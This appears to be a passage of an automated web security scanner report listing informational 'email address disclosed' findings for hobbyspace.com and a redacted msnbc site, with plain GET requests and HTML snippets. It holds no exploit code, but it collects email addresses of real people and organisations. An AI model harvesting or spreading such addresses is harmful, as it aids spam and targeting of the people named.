"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...

...[SNIP]...

26.87. http://www.hobbyspace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hobbyspace.com
Path:	/

Issue detail

The following email address was disclosed in the response:

clarklindsey@hobbyspace.com

Request

GET / HTTP/1.1
Host: www.hobbyspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.88. http://www.msnbc.redacted/id/3032118/ns/technology_and_science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032118/ns/technology_and_science

Issue detail

The following email address was disclosed in the response:

pnaskrecki@oeb.harvard.edu

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.89. http://www.msnbc.redacted/id/32359544/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/32359544/

Issue detail

The following email addresses were disclosed in the response:

mediainquiries@msnbc.com
msnbctv@msnbc.com
nbcnews@msnbc.com

Request

GET /id/32359544/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.90. http://www.msnbc.redacted/id/3303511/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3303511/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/3303511/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.91. http://www.msnbc.redacted/id/3303540/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3303540/

Issue detail

The following email addresses were disclosed in the response:

dmcaagnt@microsoft.com
name@address.com

Request

GET /id/3303540/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.92. http://www.msnbc.redacted/id/37643077 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/37643077

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/37643077 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.93. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41164445/ns/world_news-africa/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41164445/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.94. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41253088/ns/technology_and_science-science

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

26.95. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41311073/ns/business-consumer_news/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41311073/ns/business-consumer_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.96. http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41316837/ns/world_news-mideastn_africa/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41316837/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.97. http://www.msnbc.redacted/id/41317259/ns/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41317259/ns/politics

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41317259/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.98. http://www.msnbc.redacted/id/41317259/ns/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41317259/ns/politics/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41317259/ns/politics/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.99. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41320309/ns/technology_and_science-tech_and_gadgets

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

26.100. http://www.msnbc.redacted/id/41321565/ns/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41321565/ns/business/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41321565/ns/business/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.101. http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41322367/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41322367/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.102. http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41322659/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41322659/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.103. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41323843/ns/world_news-mideastn_africa

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41323843/ns/world_news-mideastn_africa HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 190719

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

26.104. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41323843/ns/world_news-mideastn_africa/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41323843/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 190068

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

26.105. http://www.msnbc.redacted/id/41324031 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324031

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41324031 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.106. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324344/ns/world_news-south_and_central_asia

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

26.107. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324344/ns/world_news-south_and_central_asia/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

26.108. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324874/ns/us_news-weird_news

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41324874/ns/us_news-weird_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.109. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324874/ns/us_news-weird_news/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41324874/ns/us_news-weird_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.110. http://www.msnbc.redacted/id/41324877/ns/world_news-europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324877/ns/world_news-europe

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41324877/ns/world_news-europe HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.111. http://www.msnbc.redacted/id/41324877/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324877/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41324877/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.112. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326456/ns/business-media_biz/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41326456/ns/business-media_biz/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.113. http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326559/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41326559/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.114. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326705/ns/world_news-south_and_central_asia

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

26.115. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326705/ns/world_news-south_and_central_asia/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

Response

26.116. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327238/ns/us_news-crime_and_courts/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41327238/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

